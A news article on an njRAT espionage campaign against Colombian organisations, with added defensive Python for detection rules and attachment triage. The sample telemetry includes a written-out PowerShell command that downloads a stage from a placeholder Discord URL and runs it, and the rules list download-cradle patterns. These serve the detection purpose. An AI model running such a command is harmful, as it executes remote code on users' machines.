Cyber espionage identified in Colombia targeting companies and government entities

A malware called njRAT has been discovered. (photo: ifep.com/Scyther)

An espionage campaign directed mainly at Colombia was recently identified; it had significant activity until the end of March this year. The cybercriminals have been trying to spread njRAT, a common type of remote access trojan, and to remain undetected on the compromised computer for as long as possible.

The campaign was named “Operation Discordia” by researchers at ESET because the attackers use the Discord platform to host malware and download it onto compromised computers. The platform was originally intended for gamers, but it has gradually grown, and cybercriminals have also started using it to host malware and perform other malicious actions.

The main victims are companies from different sectors, non-profit organizations and government agencies. Once downloaded, this malicious code allows attackers to remotely control the infected computer and perform actions such as:

– Send and receive files.

– Record keystrokes.

– Take screenshots.

– Take pictures with the camera and record audio, etc.

A person uses a laptop, in a file photograph. EFE/Sascha Steinbach

Initial access, and the infection chain that ends with the njRAT download, begins with phishing emails that impersonate official communications from the Colombian Sistema Penal Oral Acusatorio (SPOA), the country's accusatory oral criminal procedure system. These emails carry compressed files as attachments, protected by a four-digit password.

Although no examples of these phishing emails are available, the names of some of the zip attachments already give an idea of the context of the messages. The following file names are known:

– “Tax notification in your name We appreciate prompt confirmation of receipt in addition to filling out the form within the attachment.bz2”

– “I request you to register the corresponding marginal note in the original civil registry of birth of the interested parties FILE KEY 0903.R19”

– “Fiscal requirement here you will find a copy of the complaint filed against you NUNC SPOA.bz2”

The names of the files inside the compressed attachment, which may contain two or more files, also provide some clues. As the image below shows, these are files with the .vbs extension: scripts written in VBScript, the Visual Basic scripting language that Windows runs natively.

Example of the files with the .vbs extension contained in one of the compressed files that were sent as an attachment in the phishing emails. (photo: ESET)

Two different methods of infection

The people behind this campaign used two different infection mechanisms, but both end by downloading njRAT.

“If we pay attention to the following image, we can see that many of the names used for the variables are in Spanish. And if we add to this the themes used in the compressed files, it is possible that the malicious actors behind this campaign are Spanish-speaking,” says Miguel Angel Mendoza, Computer Security Researcher at ESET Latin America.

General diagram of the infection chain in Operation Discordia that distributes njRAT. (photo: ESET)

– Method 1

The attached files had a .bz2 extension and contained malicious scripts written in Visual Basic which, when executed, download a PowerShell script hosted on Discord. That script in turn downloads other modules from the same platform, and those modules are what finally download njRAT onto the computer.

The following image shows an example of the malicious code within these PowerShell scripts:

Example of a malicious code contained in the Visual Basic script. (photo: ESET)

– Method 2

In some cases a different infection method was detected. It also starts with a Visual Basic script that downloads a PowerShell script from Discord, and that script checks whether the path HKCU:\software\wow6432node\Microsoft\Windows\Update exists in the Windows registry.

If the path exists, the script stores AES-encrypted malicious code in it.

Malicious code stored in the Windows registry. (photo: ESET)
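Both infection methods leave the same footprints on an endpoint: a VBScript host launching PowerShell, a download from Discord, and (in the second method) a write under the Update registry key. The rules below turn those three observations into detection logic and run them over constructed sample telemetry. This is an added example, not ESET's data or tooling; it assumes a Sysmon-style event schema (EventID 1 for process creation with Image, ParentImage and CommandLine; EventID 13 for registry value set with Image and TargetObject), a constructed RecordId field, and the Discord attachment hosts cdn.discordapp.com and media.discordapp.net, since the article only says the payloads are "hosted on Discord".

```python
"""Detection rules for the Operation Discordia infection chain, run over
constructed sample telemetry (added example, not ESET's data or tooling).

Assumed schema: Sysmon-style records with EventID 1 (process creation:
Image, ParentImage, CommandLine) and EventID 13 (registry value set:
Image, TargetObject). RecordId is a constructed correlation field."""
import re

# Registry key the PowerShell stage checks before storing AES-encrypted code
# (the article's path with its backslashes restored). Sysmon records HKCU keys
# as HKU\<SID>\..., so the rule matches on the path suffix, not the hive name.
STAGING_KEY = re.compile(
    r"\\Software\\Wow6432Node\\Microsoft\\Windows\\Update(\\|$)", re.I)
# Discord attachment hosts (assumption: the article only says "hosted on Discord").
DISCORD_CDN = re.compile(
    r"https?://(cdn\.discordapp\.com|media\.discordapp\.net)/attachments/", re.I)
# Common PowerShell download-and-run idioms.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression",
    re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def script_host_spawns_powershell(ev):
    """Methods 1 and 2: a .vbs running under wscript/cscript launches PowerShell."""
    return (ev["EventID"] == 1
            and basename(ev["ParentImage"]) in SCRIPT_HOSTS
            and basename(ev["Image"]) in POWERSHELL)


def discord_download_cradle(ev):
    """Any process fetching a stage from the Discord CDN with a download cradle."""
    cmd = ev.get("CommandLine", "")
    return (ev["EventID"] == 1
            and DISCORD_CDN.search(cmd) is not None
            and DOWNLOAD_CRADLE.search(cmd) is not None)


def registry_staging_write(ev):
    """Method 2: PowerShell writing a value under the Update staging key."""
    return (ev["EventID"] == 13
            and basename(ev["Image"]) in POWERSHELL
            and STAGING_KEY.search(ev["TargetObject"]) is not None)


RULES = [
    ("script_host_spawns_powershell", script_host_spawns_powershell),
    ("discord_download_cradle", discord_download_cradle),
    ("registry_staging_write", registry_staging_write),
]


def detect(events):
    """Return (RecordId, rule name) pairs for every rule each event triggers."""
    return [(ev["RecordId"], name)
            for ev in events for name, rule in RULES if rule(ev)]


# Constructed sample telemetry: two events modelled on the article's chain
# (placeholder Discord IDs, no real payload) and two benign events that must not fire.
SAMPLE_EVENTS = [
    {"RecordId": 101, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -w hidden -c IEX((New-Object Net.WebClient)"
                    ".DownloadString('https://cdn.discordapp.com/attachments/"
                    "<channel-id>/<file-id>/stage2.txt'))"},
    {"RecordId": 102, "EventID": 13,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Wow6432Node"
                     r"\Microsoft\Windows\Update\Data"},
    {"RecordId": 103, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Process"},
    {"RecordId": 104, "EventID": 13,
     "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft"
                     r"\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
]

if __name__ == "__main__":
    for record_id, rule in detect(SAMPLE_EVENTS):
        print(f"record {record_id}: {rule}")
```

Record 101 fires two rules at once, which is the signal worth alerting on: a script host spawning PowerShell is noisy on its own in environments that run logon scripts, but combined with a Discord download cradle it matches Method 1 closely. The registry rule is deliberately narrow (PowerShell as the writer, the article's key as the target), so it should stay quiet on normal Windows Update activity.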

Recommendations to avoid being a victim of malware

The main recommendation for avoiding this type of campaign is to take special care with the emails that arrive in the inbox.

It’s important to pay attention to the sender’s email address, the body of the message, whether the email was unexpected, and whether the message makes sense. When in doubt, do not click on any links or download any attachments. Attackers often mask the actual format of a file by renaming it so that it appears to have a different extension.

Last but not least, it’s always good to install a reliable security solution on the device to filter out these threats as soon as they hit an email account.
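The attachment pattern described on this page (a compressed file whose members are .vbs scripts) and the closing warning about renamed extensions can both be checked mechanically before a user ever sees the message. The triage routine below, an added example that is not ESET's tooling, inspects an attachment's name, compares its declared extension with the bytes it actually starts with, and lists the members of zip and tar.bz2 archives to flag script extensions, double extensions such as "form.pdf.vbs", and password-protected members. The sample attachment is constructed in memory with placeholder member names and contents; it is not a campaign sample.

```python
"""Mail-gateway style triage of an attachment of the kind the article
describes: a .bz2 whose members are .vbs scripts, possibly hiding behind a
double extension. Added example, not ESET's tooling; the attachment below is
constructed in memory (constructed member names, no real campaign samples)."""
import io
import tarfile
import zipfile

SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".hta",
                     ".bat", ".cmd", ".exe", ".scr"}
# Document or image extensions typically used as the innocuous half of a
# double extension such as "form.pdf.vbs".
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}
# Leading bytes each container or document format is expected to start with.
MAGIC = {".bz2": b"BZh", ".zip": b"PK\x03\x04", ".pdf": b"%PDF", ".rar": b"Rar!"}


def extensions(name):
    """All extensions of a file name, lower-cased: 'a.pdf.vbs' -> ['.pdf', '.vbs']."""
    return ["." + part for part in name.lower().split(".")[1:]]


def check_name(name):
    """Findings based on the file name alone."""
    findings = []
    exts = extensions(name)
    if exts and exts[-1] in SCRIPT_EXTENSIONS:
        findings.append(f"script extension {exts[-1]}")
        if len(exts) >= 2 and exts[-2] in DECOY_EXTENSIONS:
            findings.append(f"double extension masquerading as {exts[-2]}")
    if "\u202e" in name:  # right-to-left override, used to visually reverse an extension
        findings.append("right-to-left override character in name")
    return findings


def check_magic(name, data):
    """Flag a declared extension whose content does not start with the expected bytes."""
    exts = extensions(name)
    expected = MAGIC.get(exts[-1]) if exts else None
    if expected and not data.startswith(expected):
        return [f"content does not match declared {exts[-1]} format"]
    return []


def archive_members(data):
    """(member name, password-protected) pairs for zip and tar.bz2 data; [] otherwise."""
    if data.startswith(b"PK\x03\x04"):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            # Bit 0 of the general-purpose flag marks an encrypted zip entry.
            return [(i.filename, bool(i.flag_bits & 0x1)) for i in zf.infolist()]
    if data.startswith(b"BZh"):
        try:
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:bz2") as tf:
                return [(m.name, False) for m in tf.getmembers() if m.isfile()]
        except tarfile.TarError:
            return []  # a bare bzip2 stream, not a tar: single unnamed payload
    return []


def triage(name, data):
    """Return all findings for an attachment, including those of its archive members."""
    findings = check_name(name) + check_magic(name, data)
    for member, encrypted in archive_members(data):
        findings += [f"member {member!r}: {f}" for f in check_name(member)]
        if encrypted:
            findings.append(f"member {member!r} is password-protected")
    return findings


def build_sample_bz2(members):
    """Constructed tar.bz2 attachment holding the given {name: bytes} members."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:bz2") as tf:
        for member_name, content in members.items():
            info = tarfile.TarInfo(member_name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Constructed sample: two placeholder "scripts", one behind a .pdf decoy extension.
SAMPLE_ATTACHMENT = build_sample_bz2({
    "complaint copy.pdf.vbs": b"' constructed placeholder, not a real script\r\n",
    "form.vbs": b"' constructed placeholder, not a real script\r\n",
})

if __name__ == "__main__":
    for finding in triage("notification.bz2", SAMPLE_ATTACHMENT):
        print(finding)
```

The magic-byte check is what catches the renaming trick the recommendation warns about: a file called invoice.pdf that does not begin with %PDF is reported regardless of its name. The archive listing complements it for the case on this page, where the outer container is a legitimate .bz2 and the danger is in the member names; a password-protected archive that cannot be listed is itself worth flagging, since the four-digit password in this campaign exists precisely to keep gateway scanners out.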
